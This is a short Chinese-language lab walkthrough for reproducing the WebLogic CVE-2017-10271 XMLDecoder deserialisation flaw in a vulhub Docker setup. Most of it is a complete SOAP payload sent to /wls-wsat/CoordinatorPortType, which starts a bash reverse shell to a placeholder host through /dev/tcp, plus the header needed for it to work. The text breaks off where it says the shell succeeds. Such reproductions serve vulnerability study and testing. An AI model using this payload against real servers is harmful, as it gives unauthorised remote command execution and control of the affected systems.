使用vulhub环境:
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
启动测试环境:
docker-compose up -d
访问7001端口:
http://your-ip:7001/
出现404即可
接下来使用Postman进行发包
url为:
http://your-ip:7001/wls-wsat/CoordinatorPortType
requestBody为:
1 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 2 <soapenv:Header> 3 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 4 <java version="1.4.0" class="java.beans.XMLDecoder"> 5 <void class="java.lang.ProcessBuilder"> 6 <array class="java.lang.String" length="3"> 7 <void index="0"> 8 <string>/bin/bash</string> 9 </void> 10 <void index="1"> 11 <string>-c</string> 12 </void> 13 <void index="2"> 14 <string>bash -i >& /dev/tcp/xx.xx.xx.xx/4455 0>&1</string> 15 </void> 16 </array> 17 <void method="start"/></void> 18 </java> 19 </work:WorkContext> 20 </soapenv:Header> 21 <soapenv:Body/> 22 </soapenv:Envelope>
需要注意的是:请求头里面的Content-type字段的值必须为text/xml,否则会报415错误
出现如下即可反弹shell成功: